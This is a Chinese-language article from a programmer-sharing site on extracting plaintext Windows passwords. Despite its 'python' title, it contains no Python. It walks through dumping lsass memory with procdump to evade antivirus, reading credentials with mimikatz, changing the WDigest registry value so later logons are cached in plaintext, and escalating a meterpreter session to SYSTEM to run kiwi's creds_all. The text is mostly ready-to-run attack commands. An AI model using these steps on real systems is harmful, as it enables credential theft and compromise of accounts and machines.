欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

python简单直接获取windows明文密码操作技巧

程序员文章站 2022-03-03 11:55:24
目录01、procdump+mimikatz02、window 2012 r2抓取密码03、msf kiwi模块01、procdump+mimikatz利用procdump+mimikatz 绕过杀软...

01、procdump+mimikatz

利用procdump+mimikatz 绕过杀软获取windows明文密码。

(1)工具准备:

procdump:

mimikatz:

(2)windows server 2008 r2提取明文密码

在目标机器上生成存储文件:

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

python简单直接获取windows明文密码操作技巧

将lsass.dmp复制到本地,使用mimikatz 一行命令将结果输出到文本。

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"> pssword.txt

如图:成功从内存中提取明文密码。

python简单直接获取windows明文密码操作技巧

02、window 2012 r2抓取密码

在windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。

(1)修改注册表

reg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v uselogoncredential /t reg_dword /d 1 /f

(2)用户administrator注销后重新登录,成功抓取到明文信息。

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt

python简单直接获取windows明文密码操作技巧

03、msf kiwi模块

使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前msf中的shell提升为system。

提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。

meterpreter > getuid
server username: bypass-e97ba3fc\administrator
meterpreter > getsystem 
...got system via technique 1 (named pipe impersonation (in memory/admin)).
meterpreter > getuid
server username: nt authority\system

加载kiwi模块:

load kiwi

列举系统中的明文密码:

creds_all

python简单直接获取windows明文密码操作技巧

以上就是python简单直接获取windows明文密码操作技巧的详细内容,更多关于python获取windows明文密码的资料请关注其它相关文章!